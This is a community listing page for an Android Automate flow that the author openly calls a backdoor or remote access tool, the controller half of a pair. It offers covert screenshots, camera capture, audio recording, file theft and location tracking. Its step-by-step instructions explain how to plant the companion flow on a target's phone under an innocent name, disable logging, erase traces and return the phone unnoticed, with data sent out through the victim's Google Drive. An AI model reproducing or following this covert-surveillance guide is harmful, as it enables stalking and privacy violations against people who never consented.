Remote Access Tool Owner

by Christina Rendon

Version 1 (November 29, 2020)

Download (6 downloads)

  1. Automate community
  2. Business

Build 201812011235
Premium flow. No root required.

Sometimes I feel like weaponizing Automate, and this is one of those flows.
This is exactly what the title suggests: a backdoor / Remote Access Tool to another mobile device.

Options:
• Take screenshot
• Take picture (front/back selectable)
• Browse and download all files
• Record Audio (selectable length)
• Get location

This is the MASTER part.
SLAVE can be found here:
http://llamalab.com/automate/community/flows/26265

Pro's
+ Everything is sent encrypted.
+ It deletes all files made (screenshots/audio/pictures) on SLAVE device, after they are sent to MASTER.
+ If SLAVE device is configured correctly, it'll contact MASTER by itself upon running, and all needed permissions will pop up one by one automatically (once).
+ Listener account isn't placed as plain text, but as a HEX encoded version.
+ Uses SLAVE's Google Drive account to transfer files.
+ SLAVE is 30 blocks exactly (non premium!) so it can run on any Android device!

Cons
- You will need time alone with the target device, to install Automate, the SLAVE flow, and guide it through the permission popups (see above) when it contacts MASTER.
- HEX isn't encryption, it just makes what's written unreadable until you decode it, so I suggest to create a special new Google account to be used as listener in MASTER.

Instructions:
• Download and start the MASTER (premium) flow.
• Input the account you want to use as a listener, in the MASTER flow (in menu).
• Export a HEX version of that account to clipboard (in menu)
• Download the SLAVE flow.
• Rename SLAVE flow to something innocent sounding, and delete the info text.
• Paste the HEX (from clipboard) in block 30 / the one directly beneath the FlowStart block of the SLAVE flow, replacing the example HEX.
Your R.A.T is now ready to be sent to the target.
• Start MASTER first, let it run in background (in menu).
• Dowload and start edited SLAVE on target device (send edited SLAVE flow to target using whatever you want).
• Pop ups on target device will ask for permissions needed to run this flow, accept them all, disable logging, check that Automate starts on phone start.
• Place target phone back where it's owner left it.

Disclaimer:
I understand this flow can be used in a malicious way, but that isn't my intention. Use this for good, not evil. Like checking if your kid isn't talking to strangers online. Or worse.

Build 201812011235 It's alive!

.0 average rating from 4 reviews

5 stars
0
4 stars
0
3 stars
0
2 stars
0
1 star
0
Reports
4

Reviews and ratings can be submitted in the app.